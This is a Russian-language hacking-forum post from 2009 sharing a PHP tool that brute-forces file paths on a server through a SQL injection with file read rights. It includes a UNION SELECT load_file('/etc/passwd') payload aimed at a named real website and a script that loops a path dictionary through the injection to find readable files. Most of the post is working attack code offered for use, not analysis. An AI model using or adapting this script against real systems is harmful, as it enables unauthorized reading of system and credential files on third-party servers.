29.01.2009, 22:55
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Написал брутер путей в инъекциях при file_priv= on, может кому-нибудь пригодится...
http://forum.antichat.ru/thread49775.html -- здесь можно собрать неплохой словарик для скрипта
PHP код:
<form action="" medhod="get">
Injection:<input type="text" size= name="host"><br>
<input type="submit" value="Send">
</form>
<?php
/* В поле "Injection" требуется ввести строку с подобранным количеством полей
и в принтабельном поле ввести <file> ;
=Пример=
имеется инъекция, с возможностью чтения файлов:
http://www.jfanow.org/jfanow/index.php?mode=P&id=-2913+union+select+1,load_file('/etc/passwd'),3,4,5,6,7/*
Следовательно, в форму нужно добавить:
http://www.jfanow.org/jfanow/index.php?mode=P&id=-2913+union+select+1,<file>,3,4,5,6,7/*
P.S.
#=Gr3tzz to Grey =#
#Coded by IceAngel_# */
set_time_limit(0);
$dic = file("words.txt"); //словарь с путями
if (isset($_GET['host'])){
foreach ($dic as $patch ){
$patch = str_replace("\n", "", trim($patch));
$test = str_replace("<file>", "if(load_file(0x".bin2hex($patch).")+is+null,null,3705)", $host);
$s = file_get_contents($test);
if (strpos($s,'3705'))
{ echo $patch."<br>";}}}
?>
Последний раз редактировалось Iceangel_; 29.01.2009 в 23:07..
|
|
|